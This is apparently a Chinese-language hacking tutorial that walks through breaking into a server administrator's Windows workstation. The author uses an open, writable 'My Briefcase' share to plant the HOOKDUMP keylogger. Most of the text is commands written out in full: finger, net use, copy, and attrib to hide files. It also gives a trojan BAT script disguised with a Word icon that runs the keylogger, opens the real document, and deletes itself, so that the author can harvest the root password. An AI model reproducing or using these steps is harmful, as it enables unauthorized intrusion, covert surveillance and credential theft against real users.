还是看看root信息吧:
finger [email protected]
Login name: root In real le: system PRIVILEGED account
Directory: / Shell: /bin/sh
Last login Fri Jul 28 09:21 _disibledevent=> root经常来那个202.xx.xx.xx就是他用工作站了从那会不会看到点东西呢?
net view \202.xx.xx.xx
Shared resources at \202.xx.xx.xx
Sharename Type Comment
x
x
我公文包
The command was completed successfully.
在上网机器上开着WINDOWS“文件和打印机共享”服务是很多人容易掉以轻心这个root没有例外如果它C盘共享了而且可写那就好了但那是做梦现在开了共享目录没有个是根目录连D驱都没有别着急慢慢来x掉那些文件夹都没用不能写里面尽是些英文原著这个root还挺行“我公文包”吸引了我注意这是个用于将区别机器上资料进行同步工具很显然这个root要经常更新主机上主页有时候在自己机器上编有时候在主机上编……所以很重要点:“我公文包”共享般都是可写!
那我再进去看看
>net use i: \202.xx.xx.xx
>i:
>echo asdf>temp.txt
不错确实可写
>del temp.txt
不留痕迹——黑客习惯
>dir/od/p
看看都有些什么…… 倒数第 2排那个是什么?“X月工作计划.doc”!就是它了既然是计划就不可能写完了就丢边它肯定会再次打开它——至少下个月写计划时要COPY下:->
该动手了我目标就是让它下次打开时误中我陷阱而运行我藏木马我这次用是个键盘计录软件SoftwareHOOKDUMP我觉得它挺好价钱实惠量也足…… 对不起说习惯了应该是它不仅记录下全部击键还记录下打开或关掉了什么、按过什么按纽、用过什么菜单…… 总的它记录让你就和你站在他身后看他操作计算机样详细了您要问那么多木马你为啥装这个?要知道无论是中国冰河、netspy还是外国netbus、BO都被各种杀毒软件Software列为头号侦查对象而个root机器上可不可能没装杀毒软件Software?还是HOOKDUMP好小小不起眼不过如果大家都用只怕我再用它机会就少了……
>copy hookdump.* i:
补充点:上传前先编好它hookdump.ini文件置为隐藏方式运行不然root运行屏幕上蹦出大窗口可就……
然后再在自己机器上编个同名BAT文件:X月工作计划.BAT
>edit c:X月工作计划.BAT
@echo off
hookdump
attrib -h X月工作计划.doc
C:Program FilesMicrosoftOfficeWinword X月工作计划.doc
attrib -h temp.bat
del temp.p
del temp.bat
看明白了吧?root运行了这个BAT文件实际上就是先运行木马再WINWORD文件打开它想开这个文件然后自我删除也许它机器上WINWORD位置区别那就会失败不过不要紧反正BAT会马上删除他会以为是自己误操作
这时你C驱根目录就有了这么个BAT文件它是个方形图标和那个WORD文件大相径庭root如何会运行它呢?没关系在这个文件上点右键点属性在“”栏选“更改图标”不就行了吗?WORD图标在你机器C:Program FilesMicrosoftOffice中还要将“运行”改为“最小化”“退出时关闭”打上勾这样才能保证在运行时点迹象也没有事实上这个BAT文件变成了两个还有个PIF文件就是它图标
把这两个文件传上去:
>copy X月工作计划.bat i:
>copy X月工作计划.p i:
然后把它文件和自己文件都藏起来:
>attrib +h X月工作计划.doc
>attrib +h X月工作计划.bat
这样root“公文包”里只剩下个和原来模样WORD图标他做梦也没想到这已变成了个BAT文件然后可以喘口气了让我们静静等……
几天后我进入这个工作站取下记录下来击键记录找出root口令进入主机
最新评论